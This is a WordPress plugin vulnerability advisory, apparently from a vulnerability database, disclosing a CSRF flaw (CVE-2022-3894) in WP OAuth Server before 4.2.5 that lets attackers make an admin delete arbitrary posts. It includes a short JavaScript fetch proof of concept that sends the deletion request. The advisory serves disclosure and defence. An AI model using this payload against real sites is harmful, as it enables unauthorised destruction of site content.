WordPress Plugin Vulnerabilities

WP OAuth Server < 4.2.5 - Arbitrary Post Deletion via CSRF

Description

The plugin does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.

Proof of Concept

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_remove_client&data=1',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Plugin icon
oauth2-provider
Fixed in 4.2.5

References

CVE
CVE-2022-3894

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
298487b2-4141-4c9f-9bb2-e1450aefc1a8

Timeline

Publicly Published
2023-02-21 (about 9 months ago)
Added
2023-02-21 (about 9 months ago)
Last Updated
2023-02-21 (about 9 months ago)

Other

Published
Title
Published
2014-09-17
Title
Disqus <= 2.77 - Cross-Site Request Forgery (CSRF)
Published
2021-07-21
Title
NewsPlugin < 1.1.0 - CSRF to Stored Cross-Site Scripting
Published
2023-04-25
Title
Tiempo.com <= 0.1.2 - Shortcode Deletion via CSRF
Published
2021-04-22
Title
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via CSRF
Published
2014-08-01
Title
Developer Formatter 2013.0.1.40 - devformatter.php Multiple Action CSRF